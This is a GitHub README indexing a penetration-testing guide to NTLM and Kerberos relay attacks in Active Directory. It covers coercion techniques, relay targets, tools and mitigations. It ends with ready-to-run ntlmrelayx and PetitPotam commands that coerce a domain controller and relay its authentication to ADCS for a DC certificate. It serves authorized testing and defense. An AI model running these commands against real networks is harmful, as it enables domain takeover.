rootsecdev/relay_bible

# Relay Bible — Internal Penetration Testing Relay Guide A comprehensive reference for NTLM relay attacks during authorized internal penetration tests. Covers authentication fundamentals, coercion techniques, per-protocol relay targets, tooling, advanced chaining, and defensive mitigations. ## Prerequisites - A Linux attack host (Kali, Parrot, or similar) - Python 3.10+ with Impacket installed - Network access to the target environment (authorized engagement) - Basic understanding of Active Directory and Windows networking ## Table of Contents ### 1. Fundamentals - [NTLM Authentication & Relay Theory](01-fundamentals/ntlm-authentication.md) — How NTLM works, why relaying is possible, NTLMv1 vs v2, signing, EPA - [Kerberos Authentication & Relay Theory](01-fundamentals/kerberos-authentication.md) — AS/TGS/AP exchange, SPN canonicalization, why Kerberos is still relayable - [Identifying Relay Opportunities](01-fundamentals/identifying-targets.md) — Enumeration, finding hosts without signing, mapping attack surface ### 2. Coercion Techniques - [Coercion Overview](02-coercion/overview.md) — Forcing machines to authenticate to your listener - [PetitPotam (MS-EFSRPC)](02-coercion/petitpotam.md) - [PrinterBug / SpoolSample (MS-RPRN)](02-coercion/printerbug.md) - [DFSCoerce (MS-DFSNM)](02-coercion/dfscoerce.md) - [ShadowCoerce (MS-FSRVP)](02-coercion/shadowcoerce.md) ### 3. Relay Targets (by protocol) - [SMB Relay](03-relay-targets/smb.md) — Relay to SMB for code execution - [LDAP / LDAPS Relay](03-relay-targets/ldap.md) — Delegate access, create machine accounts, RBCD - [MSSQL Relay](03-relay-targets/mssql.md) — Relay to SQL Server for command execution - [HTTP / WebDAV Relay](03-relay-targets/http-webdav.md) — Relay to web endpoints, WebDAV coercion - [ADCS Attacks (ESC1–ESC15)](03-relay-targets/adcs.md) — All ADCS escalation techniques including relay - [SMTP / IMAP Relay](03-relay-targets/smtp-imap.md) — Relay to Exchange/mail services - [RPC / DCOM Relay](03-relay-targets/rpc-dcom.md) — Relay to RPC endpoints - [SOCKS Proxy Relay](03-relay-targets/socks.md) — Maintain persistent relay sessions via SOCKS ### 4. Tool Setup & Usage - [Responder](04-tools/responder.md) — Poisoning and capturing hashes - [ntlmrelayx.py](04-tools/ntlmrelayx.md) — The primary relay framework - [mitm6](04-tools/mitm6.md) — IPv6 DNS takeover for coercion - [Certipy](04-tools/certipy.md) — ADCS enumeration and relay - [Coercer](04-tools/coercer.md) — Automated coercion tool - [krbrelayx](04-tools/krbrelayx.md) — Kerberos relay and delegation abuse ### 5. Advanced Techniques - [Cross-Protocol Relay](05-advanced-techniques/cross-protocol.md) — Relay from one protocol to another - [IPv6 Attack Chains](05-advanced-techniques/ipv6-chains.md) — mitm6 + relay combos - [Relay Chaining & Pivoting](05-advanced-techniques/chaining.md) — Multi-hop relay scenarios - [WebDAV Coercion Trick](05-advanced-techniques/webdav-coercion.md) — Forcing HTTP auth from machines - [Kerberos Relay via DNS CNAME Abuse](05-advanced-techniques/kerberos-cname-relay.md) — Cymulate / CVE-2026-20929, Kerberos TGS relay via CNAME poisoning ### 6. Defense & Detection - [Mitigations](06-defense/mitigations.md) — SMB signing, LDAP signing, EPA, disabling NTLM - [Detection](06-defense/detection.md) — Log sources, Sigma rules, behavioral indicators ## Quick Reference: NTLM Relay — What Can Relay Where? Applies to classic NTLM relay on modern (post-CVE-2019-1040) patched environments. For the more detailed cross-protocol breakdown, see [Cross-Protocol Relay](05-advanced-techniques/cross-protocol.md). | Source Auth | → SMB | → LDAP | → MSSQL | → HTTP | → ADCS | → SOCKS | |-------------|-------|--------|---------|--------|--------|---------| | SMB | ✅* | ❌† | ✅ | ✅ | ❌† | ✅ | | HTTP | ✅* | ✅ | ✅ | ✅ | ✅ | ✅ | | WebDAV | ✅* | ✅ | ✅ | ✅ | ✅ | ✅ | | MSSQL | ✅* | ✅ | ✅ | ✅ | ✅ | ✅ | \* Target must not require SMB signing † SMB-sourced NTLM includes signing flags in NEGOTIATE, which LDAP and ADCS HTTP enforce — causing the relayed session to require a signing key the attacker does not have. This is why WebDAV/HTTP-sourced auth is preferred for LDAP and ADCS relay. ## Quick Reference: Kerberos Relay via DNS CNAME Abuse The Cymulate / **CVE-2026-20929** primitive (Jan 2026) — attacker poisons DNS with a CNAME, Windows canonicalizes the SPN, client requests a TGS for the attacker's chosen target, AP-REQ is relayed. Because many services accept tickets based only on the **DNS portion** of the SPN, the source SPN class matters far less than in NTLM relay — what gates the attack is whether the target service enforces its own anti-relay control. | Target service | Relayable unless... | Patch / status | |----------------------|-------------------------------------------------------------|---------------------------------------------| | SMB | SMB signing is **required** on the target | — | | LDAP | LDAP signing is **required** | — | | LDAPS | `LdapEnforceChannelBinding = 2` (Always) | — | | HTTP / IIS | HTTP CBT enforced (`HTTP.sys` token checking = Require) | **CVE-2026-20929** backports HTTP.sys CBT | | ADCS `/certsrv/` | Extended Protection = Require on the vdir | HTTP.sys CBT via CVE-2026-20929 applies | | MSSQL | Extended Protection enabled | — | | Exchange (OWA/ECP/…) | EPA on all virtual directories | — | All rows assume attacker has network position to poison DNS (DHCPv6 via mitm6, ARP, rogue DHCPv4). Full technique: [Kerberos Relay via DNS CNAME Abuse](05-advanced-techniques/kerberos-cname-relay.md). ## Quick Start 1. **Enumerate** — Find hosts with signing disabled and identify coercion targets 2. **Position** — Start your relay listener (ntlmrelayx) pointing at your target 3. **Coerce** — Trigger authentication from a source machine to your listener 4. **Profit** — Relay captures and forwards the auth to your target protocol # Classic example: coerce DC, relay to ADCS for a DC certificate ntlmrelayx.py -t http://ca.corp.local/certsrv/certfnsh.asp -smb2support --adcs --template DomainController python3 PetitPotam.py ATTACKER_IP DC_IP